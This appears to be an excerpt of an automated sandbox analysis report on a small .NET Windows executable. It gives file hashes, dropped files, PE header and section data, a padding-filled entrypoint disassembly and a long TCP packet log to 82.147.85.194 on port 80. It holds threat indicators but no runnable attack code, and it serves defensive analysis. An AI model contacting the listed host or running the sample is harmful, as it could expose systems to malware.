                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".

                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1835008
                                                                                                    Entropy (8bit):4.466124802594884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:lIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABl0uNEdwBCswSbA:GXD944WlLZMM6YFHq+A
                                                                                                    MD5:0B41F0D1011D6FFA013E52F811F4F71B
                                                                                                    SHA1:61D222828FC0895D776ABE64598659C31B038EFA
                                                                                                    SHA-256:550D698638F5585C2C5605D7BF1D8D2D6CB51795D62A084A5FC1B5B69D4AED55
                                                                                                    SHA-512:919455EED658B8532490C95E7A333186D1B69E0636F1339834DE431CD2E132D2E5B9644570A46563326EE33E46E74A036C516A9D5834AA3C7C05DC70173DCE86
                                                                                                    Malicious:false
                                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...?4\..............................................................................................................................................................................................................................................................................................................................................4...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    \Device\Null

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\timeout.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.41440934524794
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                    Malicious:false
                                                                                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.261474995854771
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:jqOHOuPMJP.exe
                                                                                                    File size:14'336 bytes
                                                                                                    MD5:7e9a93c69aecfc2bbda9470fbd4556db
                                                                                                    SHA1:ab0e810472a897affac1a761b49595939f6897a9
                                                                                                    SHA256:82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
                                                                                                    SHA512:59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342
                                                                                                    SSDEEP:384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij
                                                                                                    TLSH:2F522C3577E49637CABE0E7649B253404375EA068822DFDD2CC8600D5DD3B868562FB7
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....A..........."...0..............M... ...`....@.. ....................................`................................

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x404d16
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4cc10x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x59c.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x4c3c0x38.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x2d1c0x2e006a50215a4de9009c9822c87b3aefe82aFalse0.5207201086956522data5.580839345941778IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x60000x59c0x60032791b53ec0675637a2192fac6511faaFalse0.4166666666666667data4.030670859022482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x80000xc0x2006136f169555e82248bf6cc07cc9f65ccFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x60900x30cdata0.4358974358974359
                                                                                                    RT_MANIFEST0x63ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Feb 10, 2024 16:17:08.365370989 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.642452955 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.642586946 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.643671036 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.921837091 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921875000 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921915054 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921937943 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921937943 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.921962976 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921992064 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921998024 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.922015905 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922038078 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.922040939 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922065973 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922085047 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.922091961 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922133923 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198327065 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198416948 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198472023 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198520899 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198577881 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198628902 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198632002 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198632956 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198682070 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198738098 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198787928 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198803902 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198803902 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198865891 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198925018 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198980093 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199033022 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199038029 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199038029 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199084997 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199136972 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199139118 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199191093 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199239969 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199240923 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199291945 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199342966 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199343920 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199394941 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199445009 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475084066 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475115061 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475151062 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475173950 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475181103 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475197077 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475224972 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475228071 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475249052 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475274086 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475277901 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475301981 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475325108 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475327015 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475348949 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475374937 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475375891 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475399017 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475419998 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475420952 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475449085 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475465059 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475474119 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475497007 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475517035 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475517035 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475543976 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475560904 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475565910 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475589991 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475611925 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475621939 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475636005 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475657940 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475658894 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475682020 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475706100 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475714922 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475728989 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475750923 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475752115 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475775003 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475795984 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475797892 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475821018 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475841045 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475841999 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475867987 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475888014 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475891113 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475914001 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475934029 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475936890 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475960970 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475979090 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475985050 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.476007938 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.476028919 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.476032972 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.476079941 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756203890 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756247044 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756272078 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756294966 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756326914 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756356001 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756381035 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756380081 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756380081 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756398916 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756405115 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756428957 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756449938 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756449938 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756479025 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756495953 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756504059 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756526947 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756541014 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756551027 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756573915 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756589890 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756597996 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756622076 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756637096 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756644964 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756669998 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756685972 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756695032 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756719112 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756735086 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756742954 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756764889 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756782055 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756788015 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756812096 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756833076 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756835938 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756861925 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756880045 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756886005 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756911993 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756931067 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756933928 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756957054 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756975889 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756979942 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757004023 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757019997 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757028103 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757050991 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757067919 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757075071 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757097960 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757117033 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757121086 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757143974 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757159948 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757174969 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757188082 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757211924 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757213116 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757236958 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757261038 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757270098 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757286072 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757302999 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757309914 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757334948 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757350922 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757356882 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757379055 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757396936 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757402897 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757422924 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757446051 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757488012 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757512093 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757531881 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757538080 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757563114 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757581949 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757585049 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757611036 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757625103 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757635117 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757659912 CET804972982.147.85.194192.168.2.4
